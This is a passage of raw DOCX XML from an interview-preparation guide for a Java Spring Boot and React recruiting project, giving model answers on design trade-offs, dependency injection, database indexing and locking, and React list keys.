            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>@RestControllerAdvice provides centralized, cross-cutting exception handling. It prevents repetitive try-catch boilerplate across 14 controllers and guarantees consistent JSON error envelopes.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Why did you use DTOs instead of passing JPA entities to the frontend?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1) Security: Prevents Mass Assignment attacks where a user passes 'role: ROLE_ADMIN'. 2) Performance: Avoids serializing unwanted database fields. 3) Stability: Prevents Jackson from crashing on circular bidirectional entity relationships.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Why did you use HashSets for skill matching instead of ArrayLists?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6048"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Checking if an element exists in an ArrayList takes O(N) linear time. In a HashSet, lookups take O(1) constant time because elements are hashed into buckets, making the match algorithm O(N+M) instead of O(N*M).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>35. How to Defend This Project in an Interview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Interviewers test your technical depth by probing architectural trade-offs. Here is how to defend key choices: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3216"/>
        <w:gridCol w:w="3216"/>
        <w:gridCol w:w="3216"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Interviewer Challenge / Trap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Why They Ask It</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3888"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Winning Technical Defense Strategy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>'Why did you build a Monolith instead of Microservices?'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Testing if you blindly follow microservice hype without understanding operational complexity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3888"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Defend that for this domain scale, a Modular Monolith offers maximum development velocity, single-transaction guarantees, and zero network latency between services. If scale demands it, our distinct domain modules (Auth, Jobs, Applications, Analytics) can be extracted into microservices.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>'Why did you use JPA instead of raw JDBC or MyBatis?'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Testing your understanding of performance vs development speed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3888"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Explain that Spring Data JPA accelerates CRUD operations, automated schema generation, and dirty checking. For complex high-throughput reporting queries, we can easily drop down to native SQL queries or JdbcTemplate without abandoning JPA.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>'Why did you use localStorage for JWT tokens instead of httpOnly cookies?'</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Testing your security awareness regarding XSS vs CSRF.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3888"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Acknowledge that localStorage is vulnerable to XSS if malicious scripts execute, but completely immune to CSRF. Explain that we sanitized all React rendering to prevent XSS. In a banking-grade production environment, we would migrate to httpOnly, SameSite=Strict cookies paired with CSRF tokens.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Master Technical Interview Bank: Deep-Dive Questions &amp; 5-Tier Responses</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>This master interview bank prepares candidates for technical vetting across Core Java, Spring Boot, Spring Security, React, SQL optimization, database locking, distributed systems, and enterprise design trade-offs. Every question is structured into 5 tiers: Short Fresher Answer, In-Depth Architectural Mechanics, Project Connection, Likely Follow-Up Question, and Winning Senior Response.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: What is the difference between Constructor Injection and Field Injection (@Autowired)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Field injection directly injects dependencies into private variables using Java reflection, whereas Constructor Injection injects them through the class constructor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Field injection makes unit testing difficult because dependencies cannot be mocked without running a Spring container or using reflection hacks. Furthermore, it hides dependency bloat and permits circular dependencies. Constructor injection guarantees that objects are fully initialized upon instantiation, allows dependencies to be declared 'final' for immutability, and makes unit tests easy because you can simply pass mock instances to the constructor without Spring.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In GlobalCo, classes like ApplicationService and JobService were refactored to prioritize constructor injection, allowing our JUnit 5 unit tests in ApplicationServiceTest to instantiate services with Mockito mocks instantly without Spring context overhead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Follow-Up: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>What happens if two beans have constructor injection and depend on each other?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-Up Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Spring throws a BeanCurrentlyInCreationException due to an unresolvable circular dependency. This signals a design flaw where the classes should be refactored, or one dependency can be resolved lazily via @Lazy or setter injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: How does Spring's @RestController differ from a traditional @Controller?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>@Controller is used in traditional Spring MVC to return HTML view templates (like JSP or Thymeleaf), whereas @RestController combines @Controller and @ResponseBody to return raw data (JSON or XML) directly in the HTTP response body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In a traditional @Controller, a method returning 'jobs' instructs the ViewResolver to locate 'jobs.html'. In a @RestController, the @ResponseBody annotation is inherited by all methods. Spring invokes Jackson's MappingJackson2HttpMessageConverter, which serializes the returned Java POJO/DTO into JSON byte streams written directly to the HttpServletResponse output stream.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Every API endpoint in GlobalCo (such as JobController and AuthController) is annotated with @RestController because the React frontend operates as an independent Single Page Application consuming pure JSON REST APIs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Follow-Up: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>How do you return an empty response with an HTTP 204 No Content status in a @RestController?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-Up Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>You return ResponseEntity&lt;Void&gt; with status ResponseEntity.noContent().build(), or annotate the void method with @ResponseStatus(HttpStatus.NO_CONTENT).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: What are B-Tree indexes, and how do they speed up database queries?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>A B-Tree index is a balanced, self-sorting tree data structure that allows the database engine to find specific records in logarithmic time O(log N) instead of scanning the entire table linearly in O(N).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Without an index, finding a user by email requires a Full Table Scan, reading every disk page. A B-Tree index stores sorted keys alongside pointers to the physical table rows (row IDs). The tree has root, branch, and leaf pages. Searching traverses from root to leaf via binary search on keys, turning millions of row inspections into 3 or 4 disk I/O reads. However, indexes add write overhead on INSERT, UPDATE, and DELETE because the index tree must be rebalanced.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In GlobalCo, we place unique indexes on users(email) and users(username), and composite indexes on applications(job_id, candidate_id) to make applicant filtering and uniqueness checks instantaneous.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Follow-Up: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>What is the difference between a Clustered Index and a Non-Clustered Index?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-Up Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>A Clustered Index dictates the physical sorting order of rows on disk; a table can have only ONE clustered index (usually the Primary Key). A Non-Clustered Index is a separate secondary structure containing sorted index keys and pointers back to the clustered index rows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: What is Optimistic Locking vs Pessimistic Locking in database transactions?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Optimistic Locking assumes conflicts are rare and verifies no updates occurred before committing; Pessimistic Locking assumes conflicts are frequent and locks database rows using 'SELECT FOR UPDATE' to block other transactions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>Optimistic locking uses a version column (@Version in JPA). When an update executes, Hibernate generates: 'UPDATE table SET col = ?, version = version + 1 WHERE id = ? AND version = ?'. If another transaction updated the row first, the version check fails (0 rows affected), and Hibernate throws an OptimisticLockException. Pessimistic locking issues a database-level row lock, holding it until transaction completion, which prevents conflicts but increases lock contention and deadlock risks.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Exact Implementation in GlobalCo: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>In GlobalCo, applicant status changes and vacancy vacancy counts use Optimistic Locking with an @Version field to prevent two recruiters from corrupting candidate states under high concurrent access without locking table rows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Interviewer Follow-Up: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>How should your frontend react when an OptimisticLockException occurs?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">Follow-Up Defense: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The backend catches the exception and returns HTTP 409 Conflict. The React frontend prompts the user: 'This record was modified by another user. Please refresh and try again.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="200" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Q: Why does React require 'key' props when rendering lists of elements?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">30-Second Interview Response: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>React uses 'key' props to track the identity of elements across renders, allowing it to efficiently determine which items in a list were added, removed, or reordered.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t xml:space="preserve">In-Depth Technical Explanation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>During reconciliation, React's diffing algorithm compares children. Without keys, if an item is inserted at the beginning of an array of 1,000 items, React compares the first new item with the first old item, sees a difference, and mutates all 1,000 DOM nodes. With unique keys (e.g., job.id), React recognizes that the original 1,000 nodes are unchanged and merely inserts one new node at the top, drastically improving rendering performance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
